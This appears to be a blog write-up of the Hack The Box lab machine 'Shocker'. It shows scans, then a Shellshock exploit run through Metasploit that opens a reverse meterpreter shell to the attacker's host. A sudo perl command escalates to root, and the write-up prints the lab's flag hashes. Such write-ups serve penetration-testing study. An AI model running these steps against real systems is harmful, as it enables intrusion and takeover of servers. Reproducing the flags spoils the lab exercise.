Shocker Write-Up

  1. Service Enumeration
  2. Further Enumeration
  3. Exploit discovery
  4. Meterpreter
  5. Privesc

Nmap

Network mapper reveals open port 80, running Apache 2.4.18.

nmap -sC -sV -p-65535 --script vuln 10.10.10.56
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))

..[snipped bunch of false-positives]..

2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)

..[snipped bunch of false-positives]..

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 379.45 seconds

Go to the WebApp:

The application does not reveal much.

Page source:

y>

<h2>Don't Bug Me!</h2>
<img src="bug.jpg" alt="bug" style="width:450px;height:350px;">

</body>
</html> 

Dirbuster:

The next logical thing is to bruteforce the directories/files in order to find hidden directories. While using dirbuster I’ve found a cgi-bin folder and looked for sensitive files such as php, sh, txt, pdf .

Shellshock

What is shellshock? Check this well done document on the topic:OWASP SHELLSHOCK

Finding and Exploiting Shellshock

msf6 > search shellshock

Matching Modules
================

   #   Name                                               Disclosure Date  Rank       Check  Description
   -   ----                                               ---------------  ----       -----  -----------
   0   auxiliary/scanner/http/apache_mod_cgi_bash_env     2014-09-24       normal     Yes    Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner

The following is the output from scanning the target uri by using the seen below msf module: http://10.10.10.56/cgi-bin/user.sh

msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > exploit

[+] uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Searching for suitable shellshock exploit:

msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > search shellshock

Matching Modules
================

   #   Name                                               Disclosure Date  Rank       Check  Description
   -   ----                                               ---------------  ----       -----  -----------
   0   auxiliary/scanner/http/apache_mod_cgi_bash_env     2014-09-24       normal     Yes    Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
   1   auxiliary/server/dhclient_bash_env                 2014-09-24       normal     No     DHCP Client Bash Environment Variable Code Injection (Shellshock)
   2   exploit/linux/http/advantech_switch_bash_env_exec  2015-12-01       excellent  Yes    Advantech Switch Bash Environment Variable Code Injection (Shellshock)
   3   exploit/linux/http/ipfire_bashbug_exec             2014-09-29       excellent  Yes    IPFire Bash Environment Variable Injection (Shellshock)
   4   exploit/multi/ftp/pureftpd_bash_env_exec           2014-09-24       excellent  Yes    Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
   5   exploit/multi/http/apache_mod_cgi_bash_env_exec    2014-09-24       excellent  Yes    Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
   6   exploit/multi/http/cups_bash_env_exec              2014-09-24       excellent  Yes    CUPS Filter Bash Environment Variable Code Injection (Shellshock)
   7   exploit/multi/misc/legend_bot_exec                 2015-04-27       excellent  Yes    Legend Perl IRC Bot Remote Code Execution
   8   exploit/multi/misc/xdh_x_exec                      2015-12-04       excellent  Yes    Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution
   9   exploit/osx/local/vmware_bash_function_root        2014-09-24       normal     Yes    OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)
   10  exploit/unix/dhcp/bash_environment                 2014-09-24       excellent  No     Dhclient Bash Environment Variable Injection (Shellshock)
   11  exploit/unix/smtp/qmail_bash_env_exec              2014-09-24       normal     No     Qmail SMTP Bash Environment Variable Injection (Shellshock)

Interact with a module by name or index. For example info 11, use 11 or use exploit/unix/smtp/qmail_bash_env_exec

By using the show info command I have found a suitable exploit for our case:

msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > show info 5

       Name: Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
     Module: exploit/multi/http/apache_mod_cgi_bash_env_exec
   Platform: 
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2014-09-24

Provided by:
  Stephane Chazelas
  wvu <[email protected]>
  juan vazquez <[email protected]>
  lcamtuf

Available targets:
  Id  Name
  --  ----
  0   Linux x86
  1   Linux x86_64

*(removed some info)*

Payload information:
  Space: 2048

Description:
  This module exploits the Shellshock vulnerability, a flaw in how the 
  Bash shell handles external environment variables. This module 
  targets CGI scripts in the Apache web server by setting the 
  HTTP_USER_AGENT environment variable to a malicious function 
  definition.

References:
  https://cvedetails.com/cve/CVE-2014-6271/
  https://cvedetails.com/cve/CVE-2014-6278/
  https://cwe.mitre.org/data/definitions/94.html
  OSVDB (112004)
  https://www.exploit-db.com/exploits/34765
  https://access.redhat.com/articles/1200223
  https://seclists.org/oss-sec/2014/q3/649

Also known as:
  Shellshock

Next, I am selecting the exploit, setting the requirements and running it, resulting in a meterpreter session.

msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set TARGETURI http://10.10.10.56/cgi-bin/user.sh
TARGETURI => http://10.10.10.56/cgi-bin/user.sh
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit

[*] Started reverse TCP handler on 10.10.14.4:1234 
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (980808 bytes) to 10.10.10.56
[*] Meterpreter session 1 opened (10.10.14.4:1234 -> 10.10.10.56:57692) at 2021-04-07 10:02:11 -0400

In the following section I have checked who am I logged-in as. Traversed to the home dir of that user and listed files, finding the user flag. In this case I was kind of lucky to check the sudoers file for misconfiguration as a very first thing. Finally, we can privesc with perl.

meterpreter > shell
Process 1530 created.                                                                                                                                                                                       
Channel 1 created.                                                                                                                                                                                          
ls   
user.sh                                                                                                                                                                                                     
whoami
shelly  

cd    

ls  
user.txt                                                                                                                                                                               

cat user.txt                        
3b52250728977779d192b0262d2c2d7e   

sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

sudo perl -e 'exec "/bin/bash"'

whoami
root

cd /root/

ls
root.txt

cat root.txt
f77dc0ce91af01ad16326409e1d05b68

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: